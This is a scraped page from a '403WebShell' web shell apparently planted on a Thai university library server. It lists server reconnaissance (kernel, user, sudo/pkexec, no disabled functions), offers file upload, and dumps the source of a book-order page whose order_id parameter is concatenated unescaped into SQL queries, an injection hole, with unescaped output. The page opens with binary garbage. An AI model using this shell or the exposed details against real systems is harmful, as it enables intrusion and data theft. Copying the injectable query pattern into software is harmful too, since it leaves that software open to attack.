403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/html/lib/selectbook2021/pages/

Upload File :

[ Back ]

Current File : /var/www/html/lib/selectbook2021/pages/order_detail.php

<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
if (isset($_POST["order_id"])) {
	$order_id = $_POST["order_id"];
} elseif (isset($_GET["order_id"])) {
	$order_id = $_GET["order_id"];
} else {
	$order_id = null;
}
if ($order_id<>"") {
	$sql = "SELECT * FROM order_detail WHERE order_id=" . $order_id ;
	$query = mysqli_query($conn,$sql);
	if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
	{
?>
<h1 class="page-header"><font color="blue">สั่งหนังสือเพื่อให้ห้องสมุดจัดซื้อเรียบร้อยแล้ว</font></h1>
<h2 class="page-header">ข้อมูลการสั่ง</h2>
<table class="table table-striped table-bordered table-hover">
	<tr>
		<td>เลขที่สั่งหนังสือ</td>
		<td><?php echo $result["order_id"];?></td>		
	</tr>
	<tr>
		<td>วันที่สั่ง</td>
		<td><?php echo $result["order_date"];?></td>		
	</tr>	
	<tr>
		<td>ชื่อผู้สั่ง</td>
		<td><?php echo $result["first_name"];?></td>		
	</tr>
	<tr>
		<td>นามสกุล</td>
		<td><?php echo $result["last_name"];?></td>		
	</tr>	
	<tr>
		<td>ประเภทสมาชิก</td>
		<td>
										<?php
											$sql3 = "SELECT * FROM user_type WHERE user_type_id='" . $result["user_type_id"] . "'" ;
											$query3 = mysqli_query($conn,$sql3);
											$result3=mysqli_fetch_array($query3,MYSQLI_ASSOC);
											echo $result3["user_type_name"];
										?>		
		</td>		
	</tr>
	<tr>
		<td>คณะ</td>
		<td>
										<?php
											$sql3 = "SELECT * FROM faculty WHERE faculty_id='" . $result["faculty_id"] . "'" ;
											$query3 = mysqli_query($conn,$sql3);
											$result3=mysqli_fetch_array($query3,MYSQLI_ASSOC);
											echo $result3["faculty_name"];
										?>			
		</td>		
	</tr>
	<tr>
		<td>โปรแกรมวิชา</td>
		<td><?php echo $result["department"];?></td>		
	</tr>		
</table>


<h2 class="page-header">รายการหนังสือที่สั่ง</h2>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">ID หนังสือ</div></th>
                                        <th><div align="center">ชื่อเรื่อง</div></th>
										<th><div align="center">ชื่อผู้แต่ง</div></th>
                                        <th><div align="center">ปีที่พิมพ์</div></th>
										<th><div align="center">สำนักพิมพ์</div></th>
										<th><div align="center">ISBN</div></th>
										<th><div align="center">URL ตัวอย่างหนังสือ</div></th>
										<th><div align="center">ราคา</div></th>
										<th><div align="center">สถานะ</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php
	$sql2 = "SELECT * FROM order_item WHERE order_id=" . $order_id . " ORDER BY order_item_id ASC";
	$query2 = mysqli_query($conn,$sql2);
	while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
	{
		$sql = "SELECT * FROM book_detail";
		$sql .= " WHERE (book_id=" . $result2["book_id"] . ")";
		$query = mysqli_query($conn,$sql);
		$result=mysqli_fetch_array($query,MYSQLI_ASSOC)
?>
                                    <tr>
										<td><?php echo $result["book_id"];?></td>	
										<td><?php echo $result["title"];?></td>
										<td><?php echo $result["author"];?></td>
										<td><?php echo $result["pub_year"];?></td>
										<td><?php echo $result["publisher"];?></td>
										<td><?php echo $result["isbn"];?></td>
										<td>
										<?php
											if ($result["link"]<>"") {
										?>
											<a href="<?php echo $result["link"];?>" target="_blank"><?php echo $result["link"];?></a>
										<?php												
											}
											else {
												echo "&nbsp;";
											}
										?>
										</td>
										<td><?php echo $result["price"];?></td>
										<?php
											$sql3 = "SELECT * FROM order_status WHERE order_status_id='" . $result2["order_status_id"] . "'" ;
											$query3 = mysqli_query($conn,$sql3);
											$result3=mysqli_fetch_array($query3,MYSQLI_ASSOC);
										?>
										<td bgcolor=<?php echo $result3["status_color"];?>>										
										<?php
											echo $result3["order_status_name"];
										?>
										</td>
                                    </tr>
<?php
	} //while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>									
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<h3 class="page-header"><font color="green">สามารถตรวจสอบสถานะการสั่งได้ที่ URL -> <a href="http://arit.skru.ac.th/lib/selectbook2021/pages/order_detail.php?order_id=<?php echo $order_id;?>">http://arit.skru.ac.th/lib/selectbook2021/pages/order_detail.php?order_id=<?php echo $order_id;?></a></font></h3>

<?php
	} else { //if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
?>
<h1 class="page-header"><font color="red">ไม่พบรายการสั่งหนังสือ</font></h1>
<?php	
	} //if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
} else { //if ($order_id<>"") 
?>
<h1 class="page-header"><font color="red">ไม่พบรายการสั่งหนังสือ</font></h1>
<?php
} //if ($order_id<>"") 
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit